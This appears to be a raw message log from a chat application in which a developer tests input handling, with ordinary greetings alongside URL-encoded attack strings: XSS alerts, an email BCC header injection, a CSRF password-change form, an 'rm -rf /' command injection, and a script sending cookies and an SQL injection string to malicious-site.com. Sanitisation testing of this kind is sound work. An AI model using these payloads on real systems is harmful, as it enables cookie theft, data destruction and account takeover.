2/1|^|Hello|^|14/12/2024 19:25:26, 
2/1|^|My%20name%20is%20rishi|^|14/12/2024 19:25:47, 
2/1|^|khadbcj%7C%5E%7Csckjhac|^|14/12/2024 19:26:07, 
2/1|^|%40!%24%23%25|^|14/12/2024 19:33:46, 
2/1|^|%3Cscript%3Ealert('XSS')%3C%2Fscript%3E|^|14/12/2024 19:34:28, 
2/1|^|%3Cb%3EBold%3C%2Fb%3E|^|14/12/2024 19:34:36, 
2/1|^|https%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D.net%2B6%26rlz%3D1C1GCEB_enIN1129IN1129%26oq%3D.net%2B6%26gs_lcrp%3DEgZjaHJvbWUyBggAEEUYOTIGCAEQRRg8MgYIAhBFGDwyBggDEEUYPNIBCDM4ODVqMGoxqAIAsAIA%26sourceid%3Dchrome%26ie%3DUTF-8|^|14/12/2024 19:36:04, 
2/1|^|https%3A%2F%2Fexample.com|^|14/12/2024 19:46:11, 
1/2|^|s|^|14/12/2024 19:47:09, 
2/1|^|%22%22|^|14/12/2024 20:05:17, 
2/1|^|%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E|^|14/12/2024 20:05:46, 
1/2|^|%60|^|14/12/2024 20:05:57, 
2/1|^|%F0%9F%98%8A%F0%9F%8E%89%F0%9F%92%AC%20(with%20emojis)|^|14/12/2024 20:06:37, 
2/1|^|%26%20or%20%3C%20or%20%3E%20in%20the%20input%20field|^|14/12/2024 20:06:49, 
2/1|^|%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(1)%22%3E|^|14/12/2024 20:07:17, 
2/1|^|%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(1)%22%3E|^|14/12/2024 20:07:19, 
1/2|^|someone%40domain.com%5Cr%5CnBCC%3Aadmin%40domain.com|^|14/12/2024 20:07:30, 
2/1|^|%3Cform%20action%3D%22yourwebsite.com%2Fupdate-password%22%20method%3D%22POST%22%3E%20%20%20%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf_token%22%20value%3D%22fake-token%22%3E%20%20%20%3Cinput%20type%3D%22text%22%20name%3D%22new_password%22%20value%3D%22attacker-password%22%3E%20%20%20%3Cbutton%20type%3D%22submit%22%3ESubmit%3C%2Fbutton%3E%20%3C%2Fform%3E|^|14/12/2024 20:09:20, 
2/1|^|%3B%20rm%20-rf%20%2F%20%3B%20echo%20%22Test%22|^|14/12/2024 20:09:28, 
2/1|^|%3Cscript%3E%20%20%20var%20exploit%20%3D%20document.createElement('script')%3B%20%20%20exploit.src%20%3D%20'http%3A%2F%2Fmalicious-site.com%2Fsteal-data%3Fcookie%3D'%20%2B%20document.cookie%20%2B%20'%26sql_query%3D'%20%2B%20encodeURIComponent('SELECT%20*%20FROM%20users%20WHERE%20username%3D%5C'admin%5C'%20AND%20password%3D%5C'%5C'%20OR%201%3D1%3B%20--')%3B%20%20%20document.body.appendChild(exploit)%3B%20%3C%2Fscript%3E|^|14/12/2024 20:12:00, 
2/1|^|hello|^|15/12/2024 13:17:26, 
2/1|^|ss|^|15/12/2024 17:58:02, 2|^|Hello|^|14/12/2024 19:25:26, 
2/1|^|My%20name%20is%20rishi|^|14/12/2024 19:25:47, 
2/1|^|khadbcj%7C%5E%7Csckjhac|^|14/12/2024 19:26:07, 
2/1|^|%40!%24%23%25|^|14/12/2024 19:33:46, 
2/1|^|%3Cscript%3Ealert('XSS')%3C%2Fscript%3E|^|14/12/2024 19:34:28, 
2/1|^|%3Cb%3EBold%3C%2Fb%3E|^|14/12/2024 19:34:36, 
2/1|^|https%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D.net%2B6%26rlz%3D1C1GCEB_enIN1129IN1129%26oq%3D.net%2B6%26gs_lcrp%3DEgZjaHJvbWUyBggAEEUYOTIGCAEQRRg8MgYIAhBFGDwyBggDEEUYPNIBCDM4ODVqMGoxqAIAsAIA%26sourceid%3Dchrome%26ie%3DUTF-8|^|14/12/2024 19:36:04, 
2/1|^|https%3A%2F%2Fexample.com|^|14/12/2024 19:46:11, 
2/1|^|s|^|14/12/2024 19:47:09, 
2/1|^|%22%22|^|14/12/2024 20:05:17, 
2/1|^|%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E|^|14/12/2024 20:05:46, 
2/1|^|%60|^|14/12/2024 20:05:57, 
2/1|^|%F0%9F%98%8A%F0%9F%8E%89%F0%9F%92%AC%20(with%20emojis)|^|14/12/2024 20:06:37, 
2/1|^|%26%20or%20%3C%20or%20%3E%20in%20the%20input%20field|^|14/12/2024 20:06:49, 
2/1|^|%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(1)%22%3E|^|14/12/2024 20:07:17, 
2/1|^|%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(1)%22%3E|^|14/12/2024 20:07:19, 
2/1|^|someone%40domain.com%5Cr%5CnBCC%3Aadmin%40domain.com|^|14/12/2024 20:07:30, 
2/1|^|%3Cform%20action%3D%22yourwebsite.com%2Fupdate-password%22%20method%3D%22POST%22%3E%20%20%20%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf_token%22%20value%3D%22fake-token%22%3E%20%20%20%3Cinput%20type%3D%22text%22%20name%3D%22new_password%22%20value%3D%22attacker-password%22%3E%20%20%20%3Cbutton%20type%3D%22submit%22%3ESubmit%3C%2Fbutton%3E%20%3C%2Fform%3E|^|14/12/2024 20:09:20, 
2/1|^|%3B%20rm%20-rf%20%2F%20%3B%20echo%20%22Test%22|^|14/12/2024 20:09:28, 
2/1|^|%3Cscript%3E%20%20%20var%20exploit%20%3D%20document.createElement('script')%3B%20%20%20exploit.src%20%3D%20'http%3A%2F%2Fmalicious-site.com%2Fsteal-data%3Fcookie%3D'%20%2B%20document.cookie%20%2B%20'%26sql_query%3D'%20%2B%20encodeURIComponent('SELECT%20*%20FROM%20users%20WHERE%20username%3D%5C'admin%5C'%20AND%20password%3D%5C'%5C'%20OR%201%3D1%3B%20--')%3B%20%20%20document.body.appendChild(exploit)%3B%20%3C%2Fscript%3E|^|14/12/2024 20:12:00, 
2/1|^|hello|^|15/12/2024 13:17:26, 
2/1|^|ss|^|15/12/2024 17:58:02, 
2/1|^|sss|^|15/12/2024 18:00:18, 
2/1|^|sss|^|15/12/2024 18:00:33, 
2/1|^|ssss|^|15/12/2024 18:01:05, 
2/1|^|Hello|^|15/12/2024 18:01:40, 
2/1|^|63tegbnq37647|^|15/12/2024 18:06:54, 
2/1|^|343%40%23!%24!%24|^|15/12/2024 18:07:04, 
2/1|^|Hello|^|17/12/2024 16:47:50, 
1/2|^|hello%20my%20dear|^|17/12/2024 16:52:40, 